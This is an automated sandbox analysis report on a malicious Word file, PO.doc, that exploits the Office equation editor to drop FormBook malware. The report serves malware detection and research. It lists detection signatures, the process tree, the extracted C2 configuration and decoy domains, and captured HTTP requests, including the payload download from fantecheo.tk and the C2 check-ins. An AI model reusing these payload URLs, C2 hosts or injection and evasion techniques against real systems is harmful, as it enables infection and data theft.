Windows Analysis Report PO.doc

Overview

General Information

Sample Name: PO.doc
Analysis ID: 492582
MD5: 601260b52c23f2be80998a22b2fc77dd
SHA1: e4fd634040abd4f6b58aa7efe8fb59f7e64a395f
SHA256: 2dfd64c86cfb81ed8a280b74e6e7b244a8a98d3788c8c552266ddd5327e4f055
Tags: doc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 292 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2692 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • ibeframnk863.exe (PID: 2800 cmdline: C:\Users\user\AppData\Roaming\ibeframnk863.exe MD5: CE20BD8F40F78DA603DD17D756745B0A)
      • ibeframnk863.exe (PID: 2852 cmdline: C:\Users\user\AppData\Roaming\ibeframnk863.exe MD5: CE20BD8F40F78DA603DD17D756745B0A)
      • ibeframnk863.exe (PID: 1580 cmdline: C:\Users\user\AppData\Roaming\ibeframnk863.exe MD5: CE20BD8F40F78DA603DD17D756745B0A)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • svchost.exe (PID: 1832 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
          • cmd.exe (PID: 2928 cmdline: /c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.handelsbetriebposavec.com/if60/"], "decoy": ["babyjames.space", "dtjug.com", "bhagteri.com", "havplan.com", "gentlesuccess.net", "negativeminus.com", "utesm.com", "ngomen.online", "abohemianeducation.com", "hyper-quote.com", "poseidonflooring.com", "theshopdental.com", "consumelocaloficial.com", "tineue.com", "traerpolio.com", "somnambulantfarms.com", "sugarhillclassiccars.com", "brasseriedufayard.com", "replacerglass.net", "lazyguysmarketing.com", "audiofactaesthetic.com", "14551bercaw.com", "piaamsterdam.com", "coolkidssale.com", "advikaa.com", "suamui.net", "19820907.com", "ankibe.com", "barrelandlens.com", "personowner.guru", "gigexworld.com", "visionandcourage.com", "livelyselfcare.com", "hellohomeowner.com", "bestwazifaforloveback.com", "dyvikapeel.com", "ignitemyboiler.com", "photosbyamandajdaniels.com", "sofuery.com", "rawimage.net", "outtact.com", "tomura-dc.com", "tkachovagv.com", "theheavymental.com", "interfaceprosthetics.com", "publicpod.net", "investotbank.com", "fishguano.com", "livetvchannels.xyz", "trendinggk.com", "adlun.com", "studyhandbook.com", "cardinal.moe", "urbantennis.info", "jsbr.online", "simplyforus.com", "keyleadhealth.com", "aliltasteofnewyork.com", "usdigipro.com", "debbielin.com", "9921.xyz", "watdomenrendi05.com", "asustech.net", "rm-elektrotechnik.gmbh"]}

Yara Overview

Memory Dumps

Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source: 6.2.ibeframnk863.exe.400000.1.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
      Source: 6.2.ibeframnk863.exe.400000.1.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 6.2.ibeframnk863.exe.400000.1.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
      Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          Exploits:

          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network Connection, Author: Joe Security, Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2692, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2692, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exe

          System Summary:

          Sigma detected: Droppers Exploiting CVE-2017-11882
          Source: Process started, Author: Florian Roth, Data: Command: C:\Users\user\AppData\Roaming\ibeframnk863.exe, CommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ibeframnk863.exe, NewProcessName: C:\Users\user\AppData\Roaming\ibeframnk863.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2692, ProcessCommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ProcessId: 2800
          Sigma detected: Suspect Svchost Activity
          Source: Process started, Author: David Burkett, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentImage: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1832
          Sigma detected: Suspicious Svchost Process
          Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentImage: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1832
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process started, Author: vburov, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentImage: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1832

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: PO.doc, Virustotal: Detection: 43%
          Source: PO.doc, ReversingLabs: Detection: 28%
          Yara detected FormBook
          Source: Yara match, File source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://fantecheo.tk/ibefrankszx.exe, Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: www.handelsbetriebposavec.com/if60/, Virustotal: Detection: 8%
          Source: http://fantecheo.tk/ibefrankszx.exe, Virustotal: Detection: 16%
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exe, ReversingLabs: Detection: 20%
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ReversingLabs: Detection: 20%
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: ibeframnk863.exe, svchost.exe
          Source: Binary string: svchost.pdb source: ibeframnk863.exe, 00000006.00000002.505477626.00000000006A1000.00000004.00000020.sdmp
          Source: global traffic, DNS query: name: fantecheo.tk
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Code function: 4x nop then pop ebx, 6_2_00407B1A
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Code function: 4x nop then pop edi, 6_2_00417D85
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Code function: 4x nop then pop edi, 6_2_00417DBA
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop ebx, 8_2_00087B1C
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop edi, 8_2_00097D85
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop edi, 8_2_00097DBA
          Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 99.83.154.118:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 99.83.154.118:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 99.83.154.118:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 63.250.43.8 80
          Source: C:\Windows\explorer.exe, Domain query: www.personowner.guru
          Source: C:\Windows\explorer.exe, Domain query: www.audiofactaesthetic.com
          Source: C:\Windows\explorer.exe, Network Connect: 99.83.154.118 80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.handelsbetriebposavec.com/if60/
          Source: global traffic, HTTP traffic detected: GET /if60/?xPDxn6=9rThgvBPeDs8DTH&9rK4ARq=HAVwTDf9hhdM5uVFiR32xlZPJI7px6PgcsWLOsR2qKnXYIicfNgC1ah67lW/5Lf7WlrZFg== HTTP/1.1 | Host: www.personowner.guru | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /if60/?9rK4ARq=hKBoXJ/uTBXo6goup8EgTG8p/x7KMVUxfENEE605vE090EN0jXzIfy3RZCXjDv+XGbJHcA==&xPDxn6=9rThgvBPeDs8DTH HTTP/1.1 | Host: www.audiofactaesthetic.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Tue, 28 Sep 2021 18:42:28 GMT | Content-Type: application/x-msdownload | Content-Length: 624640 | Last-Modified: Tue, 28 Sep 2021 03:45:00 GMT | Connection: keep-alive | ETag: "61528fbc-98800" | Accept-Ranges: bytes
          Source: global traffic, HTTP traffic detected: GET /ibefrankszx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: fantecheo.tk | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | date: Tue, 28 Sep 2021 18:44:30 GMT | transfer-encoding: chunked | connection: close
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000007.00000000.463319655.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694748305.00000000031E0000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.465106140.0000000003E50000.00000002.00020000.sdmp, String found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.448770237.000000000838C000.00000004.00000001.sdmp, String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.448770237.000000000838C000.00000004.00000001.sdmp, String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.463319655.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694748305.00000000031E0000.00000002.00020000.sdmp, String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmp, String found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmp, String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmp, String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp4MP&
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmp, String found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmp, String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.434757196.0000000003DF8000.00000004.00000001.sdmp, String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmp, String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmp, String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=12
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F37BA74A-2884-4D29-90C1-0C63AEE1F3DB}.tmp
          Source: unknown, DNS traffic detected: queries for: fantecheo.tk
          Source: global traffic, HTTP traffic detected:
            GET /ibefrankszx.exe HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: fantecheo.tk
            Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected:
            GET /if60/?xPDxn6=9rThgvBPeDs8DTH&9rK4ARq=HAVwTDf9hhdM5uVFiR32xlZPJI7px6PgcsWLOsR2qKnXYIicfNgC1ah67lW/5Lf7WlrZFg== HTTP/1.1
            Host: www.personowner.guru
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic, HTTP traffic detected:
            GET /if60/?9rK4ARq=hKBoXJ/uTBXo6goup8EgTG8p/x7KMVUxfENEE605vE090EN0jXzIfy3RZCXjDv+XGbJHcA==&xPDxn6=9rThgvBPeDs8DTH HTTP/1.1
            Host: www.audiofactaesthetic.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
